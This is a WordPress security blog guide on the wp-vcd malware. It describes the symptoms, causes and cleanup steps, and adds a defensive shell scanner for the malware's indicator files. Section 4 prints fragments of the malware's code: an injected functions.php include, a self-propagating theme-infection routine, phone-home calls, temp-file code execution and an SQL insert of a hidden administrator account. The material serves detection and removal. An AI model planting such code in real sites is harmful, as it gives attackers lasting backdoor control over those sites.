How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected

Last Updated: 12th September, 2019

A few days back, our own website experienced this wp-vcd.php malware attack all of a sudden. We instantly took steps to resolve the issue with appropriate actions. We consulted our hosting provider and later secured our website from the wp-vcd.php malware attack with the help of the free versions of the Wordfence Security – Firewall & Malware Scan plugin and the Anti-Malware Security and Brute-Force Firewall plugin, and imposed some more security strategies.

Therefore, please don’t implement, change or delete any files without reading the full article. We also request that you do NOT install each and every security plugin unless you know what you are doing. Finally, remember to always take a backup before you do anything. Let’s now concentrate on our “How To Secure wp-vcd.php Malware Attack In WordPress Websites And Stay Protected” guide.

1: What Is WordPress wp-vcd Malware and wp-vcd Malware Hack?

Recently, we observed a new sort of malware infecting WordPress websites by exploiting flaws in outdated themes and plugins. The wp-vcd malware creates backdoor access to your website by adding hidden WordPress administrator users. Further, some variants of the malicious code have been seen to alter core WordPress files and also add new files in the installation's /wp-includes directory.

  • The wp-vcd malware creates spam URLs on the website (also referred to as URL injection).
  • The malware creates a backdoor entry point that allows hackers to access your website for long periods.
  • Hackers can exploit vulnerabilities in WordPress themes and plugins to upload the wp-vcd malware to exposed websites.

Such a hack can be easily avoided by maintaining strategic monitoring with a Web Application Firewall (WAF), such as Sucuri SiteCheck, together with regular malware scanning. It is also essential to check for any modification of WordPress core files, themes and plugins.

2: The top reasons responsible for the wp-vcd malware hack

  • The most widely recognized cause of the hack is the use of a nulled theme; the wp-vcd malware usually comes pre-bundled with each theme downloaded from nulled theme websites.
  • You are still using outdated WordPress themes and plugins on your website.
  • No Web Application Firewall (WAF) is installed to shield the site from hacking attempts.

3: What are the Signs and Symptoms of wp-vcd Malware?

  • A completely new WordPress admin user has been added out of the blue.
  • Your hosting provider might have suspended your WordPress hosting account because of the wp-vcd malware attack, in order to protect the other websites on the same server.
  • SEO spam, for example Japanese search results or a Pharma Hack attack in Google search results, is another very common sign and symptom. Become familiar with WordPress spam in search results and how to secure against it. The following is a screen capture of Google spam indexed results:

[Screenshot: wp-vcd.php Malware Attack in Google Search Results]

  • Unknown JavaScript code in the source of your website.
  • Pages of your website are being redirected to obscure and shady websites.
  • Unknown PHP files in your installation's wp-includes folder which are not found in the WordPress GitHub repository.
  • PHP files in your installation's wp-content/uploads directory and its sub-directories.

4: Scrutinizing what the wp-vcd malware does

Within your theme (whatever theme you are using), in the functions.php file, you might observe code like this:

<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>

This code includes the class.theme-modules.php file, which in turn installs the wp-vcd malware into the other themes already installed (regardless of whether they are enabled or disabled) and creates the various malicious files.

Listed below are the different code patterns found in the malware's suspicious code:

Pattern 1

ini_set('display_errors', 0);
$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...(base64-encoded string of PHP code)
...; ?>

Pattern 2

if (!file_exists(ABSPATH . 'wp-includes/wp-tmp.php')) {
 @file_put_contents(get_template_directory() . '/wp-tmp.php', $tmpcontent);
 if (!file_exists(get_template_directory() . '/wp-tmp.php')) {
 @file_put_contents('wp-tmp.php', $tmpcontent);
 } ; ?>

Pattern 3

$install_code = 'c18615a1ef0e1cd813b388b4b6e29bcdc18615a1ef0e1cd813b388b4b6e29bcd[...Blah blah blah..]
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
   $install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));

Pattern 4

if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php')){
    if (strpos($content, 'WP_V_CD') === false){
        $content = $install_code . $content ;
        @file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
        touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
    else { $ping = false; }

Pattern 5

if ($ping) { $content = @file_get_contents('' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('')); }
if ($ping2) { $content = @file_get_contents('' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash); @file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents(''));//echo ABSPATH . 'wp-includes/class.wp.php'; }

Pattern 6

$wpdb->query("INSERT INTO $wpdb->users (`ID`, `user_login`, `user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `user_status`, `display_name`) VALUES ('100011111', '100011111', '\$P\$c18615a1ef0e1cd813b388b4B6e29bcd.', '100011111', '[email protected]', '', '2010-06-07 00:00:00', '', '0', '100010010')");

Pattern 7

if( isset($_GET['key']) ) { $options = get_option( EWPT_PLUGIN_SLUG ); echo '<center><h2>' . esc_attr( $options['user_name'] . ':' . esc_attr( $options['api_key'])) . '<br>'; echo esc_html( envato_market()->get_option( 'token' ) ); echo '</center></h2>'; } }

Pattern 8

function wp_temp_setupx($phpCode)
 $tmpfname = tempnam(sys_get_temp_dir(), "wp_temp_setupx");
 $handle = fopen($tmpfname, "w+");
 fwrite($handle, "<?php\n" . $phpCode);
 include $tmpfname; unlink($tmpfname);
 return get_defined_vars();

Pattern 9

foreach ($wpdb->get_results('SELECT * FROM `' . $wpdb->prefix . 'posts` WHERE `post_status` = "publish" AND `post_type` = "post" ORDER BY `ID` DESC', ARRAY_A) as $data)
$post_content = preg_replace('!<div id="'.$div_code_name.'">(.*?)</div>!s', '', $data -> post_content);
$file = preg_replace('/'.$matcholddiv[1][0].'/i',$_REQUEST['newdiv'], $file);
$file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
if ($wpdb -> query('INSERT INTO `' . $wpdb->prefix . 'datalist` SET `url` = "/'.mysql_escape_string($_REQUEST['url']).'", `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string($_REQUEST['content']).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'" ON DUPLICATE KEY UPDATE `title` = "'.mysql_escape_string($_REQUEST['title']).'", `keywords` = "'.mysql_escape_string($_REQUEST['keywords']).'", `description` = "'.mysql_escape_string($_REQUEST['description']).'", `content` = "'.mysql_escape_string(urldecode($_REQUEST['content'])).'", `full_content` = "'.mysql_escape_string($_REQUEST['full_content']).'"'))

Pattern 10

if ( ! function_exists( 'wp_temp_setup' ) ) {
if($tmpcontent = @file_get_contents("".$path))

There may be more patterns, but we need to understand them minutely and perfectly before we act on them.

As analyzed in the previous segment, this code creates a new administrator user with a name like 100010010. The goal of this backdoor administrator account is to ensure that the hacker can still get into the website regardless of whether you erase the malicious code; essentially, the attackers can return and attack your website again at a later point in time.

5: How to clean up the wp-vcd malware infection?

Scan for occurrences of the files/strings below on your server and inspect their contents. Make sure to run a diff check of the file contents against the corresponding files in the WordPress core GitHub repository or the plugin/theme directory. You can use either of the methodologies (or both) via SSH (Secure Shell) or via your IDE (Integrated Development Environment).

5.1: Strategy 1 – Scan for files on the server that are typically infected by the wp-vcd hack:

  1. wp-includes/wp-vcd.php
  2. wp-includes/wp-tmp.php
  3. wp-content/themes/*/functions.php (each and every theme installed on the server, regardless of whether it is active or not)
  4. class.theme-modules.php
  5. class.wp.php
  6. admin.txt
  7. codexc.txt
  8. code1.php
  9. cookie.txt
  10. class.theme-modules.php (inside of your theme folder)
  11. codeX.php
  12. test.php

5.2: Strategy 2 – Scan for string patterns that are found in infected malware files:

  1. $install_code
  2. tmpcontentx
  3. function wp_temp_setupx
  4. wp-tmp.php
  5. stripos($tmpcontent, $wp_auth_key)
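
As an added example (not the article's own code), the following POSIX shell script automates the checks in sections 4, 5.1 and 5.2: it walks a WordPress tree for the dropped file names, the marker strings, and PHP files under wp-content/uploads, and runs against a constructed fixture tree. The fixture layout and the inert marker contents are assumptions; `find`, `grep -r --include` and `sed` are assumed available on the host.

```shell
#!/bin/sh
# Added example, not from the original article: a defender's triage script that
# walks a WordPress tree for the wp-vcd indicators named in sections 4, 5.1 and
# 5.2. Findings are printed one per line (FILE / STRING / UPLOAD); review every
# hit against a clean upstream copy before deleting anything.

scan_wp_vcd() {
  root=$1
  # 5.1: file names the infection drops (matched by basename, anywhere in the tree)
  names='wp-vcd\.php|wp-tmp\.php|class\.theme-modules\.php|class\.wp\.php|admin\.txt|codexc\.txt|code1\.php|cookie\.txt|codeX\.php|test\.php'
  # 5.2 strings, plus the functions.php include line and the WP_V_CD marker from section 4
  strings='\$install_code|tmpcontentx|function wp_temp_setupx|wp-tmp\.php|stripos\(\$tmpcontent, \$wp_auth_key\)|class\.theme-modules\.php|WP_V_CD'
  {
    find "$root" -type f | grep -E "/($names)$" | sed 's/^/FILE    /'
    grep -rlE --include='*.php' "$strings" "$root" | sed 's/^/STRING  /'
    # section 3: PHP files have no business living under the uploads directory
    find "$root/wp-content/uploads" -type f -name '*.php' 2>/dev/null | sed 's/^/UPLOAD  /'
  } | sort -u
}

# Constructed fixture (not a real infection): a minimal WordPress-like tree with
# one theme carrying the include line from section 4, one clean theme, and a
# stray PHP file under uploads. Inert comment-only files stand in for payloads.
make_fixture() {
  d=$(mktemp -d)
  mkdir -p "$d/wp-includes" "$d/wp-content/themes/infected" \
           "$d/wp-content/themes/clean" "$d/wp-content/uploads/2019/09"
  printf '%s\n' "<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>" \
    > "$d/wp-content/themes/infected/functions.php"
  printf '<?php // WP_V_CD  (inert constructed marker, no payload)\n' \
    > "$d/wp-content/themes/infected/class.theme-modules.php"
  printf '<?php // inert constructed marker\n' > "$d/wp-includes/wp-vcd.php"
  printf '<?php // PHP under uploads, constructed\n' > "$d/wp-content/uploads/2019/09/image.php"
  printf '<?php add_theme_support("title-tag");\n' > "$d/wp-content/themes/clean/functions.php"
  echo "$d"
}

fixture=$(make_fixture)
scan_wp_vcd "$fixture"          # expect 5 lines: 2 FILE, 2 STRING, 1 UPLOAD
rm -rf "$fixture"
```

Run it as `scan_wp_vcd /path/to/wordpress` on a real install; a clean tree prints nothing, and a FILE hit on a name such as test.php still needs manual confirmation, since legitimate plugins can ship files with that name.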

6: How to secure WordPress and stay protected from the Backdoor Hack?

  1. Create a simple yet bold security strategy for your WordPress website:
    1. Clean – Diligently make sure that your website files and database are 100% clean and malware free.
    2. Secure – Install a good Web Application Firewall (WAF) like the Wordfence Security – Firewall & Malware Scan plugin to block any kind of re-infection attempt.
    3. Monitor – Run regular malware scans to check whether any of the files or database entries have been altered.
  2. Delete any kind of unused WordPress themes (even if they are disabled).
  3. Totally avoid nulled themes and plugins on your website.
  4. Regularly and religiously update the WordPress core files, plugins and themes.

7: Conclusion and VILab India Ultimate WordPress Security Guide

Disinfecting websites infected with such malware isn’t simple in every case, since once activated on a website, the malware tends to infect other sections of the website as well by implanting diverse kinds of malicious code.

Moreover, this specific malware also creates a backdoor access which permits the bad actors to control your website. Consequently, it is vital to adopt a viable security strategy that performs an exhaustive analysis of your website and afterwards completely removes the hack. We strongly recommend that you follow our Ultimate WordPress Security Guide, where you can find 25+ tricks and resolutions to stay secure online.

Don’t be selfish: share this with all your fellow WordPress users and friends.
